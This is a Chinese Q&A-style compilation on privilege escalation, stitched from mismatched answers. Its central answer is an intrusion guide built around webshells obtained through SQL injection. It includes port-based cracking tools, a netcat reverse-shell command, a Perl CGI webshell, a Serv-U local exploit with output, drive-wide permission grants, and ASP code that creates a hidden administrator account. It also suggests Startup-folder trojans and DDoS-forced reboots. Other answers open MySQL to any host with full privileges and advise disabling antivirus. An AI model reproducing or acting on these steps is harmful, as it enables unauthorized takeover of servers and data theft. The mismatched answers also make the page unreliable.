本文目录一览:
- 1、怎样注入PHP网站提权3389权限
- 2、WINDOWS 7 怎样完全提权???
- 3、php提权能控制整个主机吗,如同从本机登陆远程3389主机
- 4、如何找漏洞,又怎样利用它提权
- 5、如何用手机提权u880,2.2.2的,谢谢
怎样注入PHP网站提权3389权限
查找可用的注入点,注入后得到管理员帐号密码进后台传小马后再大马提权OK
WINDOWS 7 怎样完全提权???
新建一个文本文档 复制以下内容到新建的文档中
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="获取管理员权限"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="获取管理员权限"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="获取管理员权限"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y icacls \"%1\" /grant administrators:F /t"
现在关闭此文档 并且文件名保存为 提权.reg
现在打开刚才做好的文件 点击确定导入注册表
在需要提权的文件上点击右键 会有一个获取管理员权限选项 点击一个黑框闪过
你就提权了。。。。如果是一个目录黑框会多显示一会 待它自动关闭即可
php提权能控制整个主机吗,如同从本机登陆远程3389主机
2/4分步阅读
远程连接服务器之前首先需要把基本的准备工作做好,比如首先在服务器创建一个新的网站,并把相应的网站内容上传好。
我这里以wdcp linux服务器为例子,如下图所示创建一个新的网站

2/3
通过flashfxp等软件将网站上传至服务器

3/3
进入phpmyadmin,导入sql文件

连接远程数据库
1/4
选择该数据库,然后点击权限,可以看到如下图所示,然后点击下方添加新用户

2/4
然后输入新用户信息:
1、输入用户名
2、主机:选择任意主机,然后输入 %
(开启mysql本身的远程连接,简单说,就是在创建mysql用户时的主机名,使用IP,域名,或%号就可以,"%"代表所有,也就是任何人和机器都可以连接,只要有用户密码,也可以针对IP,域名来做限制)
3、生成密码
4、全局权限:全选
5、最后执行

3/4
通过以上步骤就生成了一个可以远程访问的数据库,然后通过更改网站配置文件,php文件配置路径如下图,选择database.php,然后打开文件
如何找漏洞,又怎样利用它提权
1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破(字典是关键)
最后 SQLTools.exe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
2. 4899端口入侵
用4899过滤器.exe,扫描空口令的机器
3. 3899的入侵
对很早的机器,可以试试3389的溢出(win3389ex.exe)
对2000的机器,可以试试字典暴破。(tscrack.exe)
4. 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL进行注入。(啊D的注入软件)。
5. serv-u入侵(21端口)
对5. 004及以下系统,可用溢出入侵。(serv5004.exe)
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 3127等端口
可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
经典IPC$入侵
本篇文章结合了许多高手提升权限的技巧和自己的一些想法
当我们取得一个webshell时候,下一部要做的就是提升权限
个人总结如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
2.C:\WINNT\system32\config\
进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside
3.C:\Documents and Settings\All Users\「开始」菜单\程序\
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:\winnt\system32\inetsrv\data\
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:\php, 用phpspy
c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "HTMLPRE\r\n", 13);
open(STDERR, "STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n/PRE/HTML\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
\perl\bin\su.exe
返回:
Serv-u 3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u 3.x Local Exploit by xiaolu
220 Serv-U FTP Server v5.2 for WinSock ready...
USER LocalAdministrator
331 User name okay, need password.
******************************************************
PASS #l@$ak#.lk;0@P
230 User logged in, proceed.
******************************************************
SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
200-DomainID=2
220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
USER xl
331 User name okay, need password.
******************************************************
PASS 111111
230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:
\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"
6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
7.还可以用这段代码试提升,好象效果不明显
%@codepage=936%%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz"/Administrators,group")
Set od=ob.Create("user","WekweN$")
od.SetPassword "WekweN" -----密码
od.SetInfo
Set of=GetObject(oz"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超级帐号建立成功!"%
用这段代码检查是否提升成功
%@codepage=936%
%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.CreateObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"tN.ComputerName"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name"br"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%
8.C:\Program Files\Java Web Start\
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"
以上是本人的拙见,大家有什么好的方法多多分享
如何用手机提权u880,2.2.2的,谢谢
工具自己找下吧
U880提权及刷入recovery的方法和步骤
方法一:使用子规制作的一键root、刷入recovery包提权、刷入recovery。
步骤1:安装相应ROM版本的joinme软件(没有刷B10版本底包的同学可直接用官方标配的光盘安装,已经硬刷至B10版本的同学请卸载旧版Joinme后,将手机连接电脑后点击我的电脑---点击名为JOINME的盘符——安装JOINME);安装结束后右键我的电脑---进入设备管理器, 发现有ADB interface项之后便可进行ROOT操作了,如果未发现请重启计算机再试。 2011-8-2 21:50:13 上传下载附件 (9.29 KB)
步骤2:下载子规制作的一键root、添加recovery包并解压至电脑任意盘符下(不可放入手机SD卡上运行),在此过程中杀毒软件会报发现病毒,将ROOT程序设为信任就可以了,实在不行请先关闭杀毒软件。
步骤3:运行“一键ROOT-u880-v2.1.exe”文件,然后按照指示完成操作就可以完成提权(在重启机器之后,在程序列表里出现一个叫授权管理的小骷髅头,那说明你成功ROOT了) 或刷入recovery了。
2011-8-2 21:53:55 上传下载附件 (83.34 KB)
方法二:
步骤1:同以上方法的步骤一。
步骤2:下载并打开superoneclick,在Universal界面下点击root键就可以了,在重启机器之后,在程序列表里出现一个叫授权管理的小骷髅头,那说明你成功ROOT了。
2011-8-2 22:17:32 上传下载附件 (39.82 KB)
数据银行网盘附件:
【DBank网盘】SuperOneClick v1.9.1.rar(1.37M)
数据银行网盘附件:
【DBank网盘】